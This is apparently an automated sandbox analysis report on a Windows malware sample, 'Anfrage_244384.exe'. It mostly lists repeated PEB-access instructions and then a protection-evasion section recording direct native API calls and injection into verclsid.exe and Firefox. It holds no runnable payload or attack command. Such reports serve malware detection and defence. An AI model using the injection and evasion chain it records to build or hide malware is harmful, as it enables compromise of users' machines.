Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346692FF mov eax, dword ptr fs:[00000030h] 4_2_346692FF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347212ED mov eax, dword ptr fs:[00000030h] 4_2_347212ED
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346792C5 mov eax, dword ptr fs:[00000030h] 4_2_346792C5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469B2C0 mov eax, dword ptr fs:[00000030h] 4_2_3469B2C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h] 4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h] 4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466B2D3 mov eax, dword ptr fs:[00000030h] 4_2_3466B2D3
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h] 4_2_3469F2D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F2D0 mov eax, dword ptr fs:[00000030h] 4_2_3469F2D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h] 4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h] 4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h] 4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346852A0 mov eax, dword ptr fs:[00000030h] 4_2_346852A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h] 4_2_347072A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347072A0 mov eax, dword ptr fs:[00000030h] 4_2_347072A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h] 4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F92BC mov eax, dword ptr fs:[00000030h] 4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h] 4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F92BC mov ecx, dword ptr fs:[00000030h] 4_2_346F92BC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h] 4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h] 4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h] 4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347392A6 mov eax, dword ptr fs:[00000030h] 4_2_347392A6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h] 4_2_346A329E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A329E mov eax, dword ptr fs:[00000030h] 4_2_346A329E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745283 mov eax, dword ptr fs:[00000030h] 4_2_34745283
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34713370 mov eax, dword ptr fs:[00000030h] 4_2_34713370
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F367 mov eax, dword ptr fs:[00000030h] 4_2_3472F367
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h] 4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h] 4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677370 mov eax, dword ptr fs:[00000030h] 4_2_34677370
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h] 4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466D34C mov eax, dword ptr fs:[00000030h] 4_2_3466D34C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34745341 mov eax, dword ptr fs:[00000030h] 4_2_34745341
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h] 4_2_34669353
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34669353 mov eax, dword ptr fs:[00000030h] 4_2_34669353
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469F32A mov eax, dword ptr fs:[00000030h] 4_2_3469F32A
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667330 mov eax, dword ptr fs:[00000030h] 4_2_34667330
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h] 4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473132D mov eax, dword ptr fs:[00000030h] 4_2_3473132D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h] 4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h] 4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F930B mov eax, dword ptr fs:[00000030h] 4_2_346F930B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347453FC mov eax, dword ptr fs:[00000030h] 4_2_347453FC
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472F3E6 mov eax, dword ptr fs:[00000030h] 4_2_3472F3E6
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472B3D0 mov ecx, dword ptr fs:[00000030h] 4_2_3472B3D0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h] 4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h] 4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_347113B9 mov eax, dword ptr fs:[00000030h] 4_2_347113B9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h] 4_2_346A33A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A33A0 mov eax, dword ptr fs:[00000030h] 4_2_346A33A0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346933A5 mov eax, dword ptr fs:[00000030h] 4_2_346933A5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3474539D mov eax, dword ptr fs:[00000030h] 4_2_3474539D
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h] 4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346C739A mov eax, dword ptr fs:[00000030h] 4_2_346C739A
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34681C60 mov eax, dword ptr fs:[00000030h] 4_2_34681C60
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A1C7C mov eax, dword ptr fs:[00000030h] 4_2_346A1C7C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h] 4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667C40 mov ecx, dword ptr fs:[00000030h] 4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h] 4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h] 4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FC4F mov eax, dword ptr fs:[00000030h] 4_2_3472FC4F
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34741C3C mov eax, dword ptr fs:[00000030h] 4_2_34741C3C
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABC3B mov esi, dword ptr fs:[00000030h] 4_2_346ABC3B
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h] 4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h] 4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h] 4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F9C32 mov eax, dword ptr fs:[00000030h] 4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h] 4_2_3474BC01
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h] 4_2_3474BC01
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h] 4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h] 4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346FBC10 mov ecx, dword ptr fs:[00000030h] 4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h] 4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h] 4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h] 4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h] 4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h] 4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h] 4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h] 4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h] 4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h] 4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h] 4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h] 4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h] 4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h] 4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h] 4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h] 4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h] 4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h] 4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h] 4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3466DCA0 mov eax, dword ptr fs:[00000030h] 4_2_3466DCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469FCA0 mov ecx, dword ptr fs:[00000030h] 4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h] 4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h] 4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h] 4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h] 4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h] 4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h] 4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABCA0 mov ecx, dword ptr fs:[00000030h] 4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h] 4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h] 4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h] 4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h] 4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h] 4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h] 4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h] 4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h] 4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h] 4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h] 4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h] 4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h] 4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h] 4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h] 4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h] 4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h] 4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h] 4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34667D41 mov eax, dword ptr fs:[00000030h] 4_2_34667D41
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h] 4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h] 4_2_34683D40

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Anfrage_244384.exe Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: read write
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\verclsid.exe Thread register set: target process: 1832
Source: C:\Windows\SysWOW64\verclsid.exe Thread APC queued: target process: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe
Source: C:\Users\user\Desktop\Anfrage_244384.exe Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
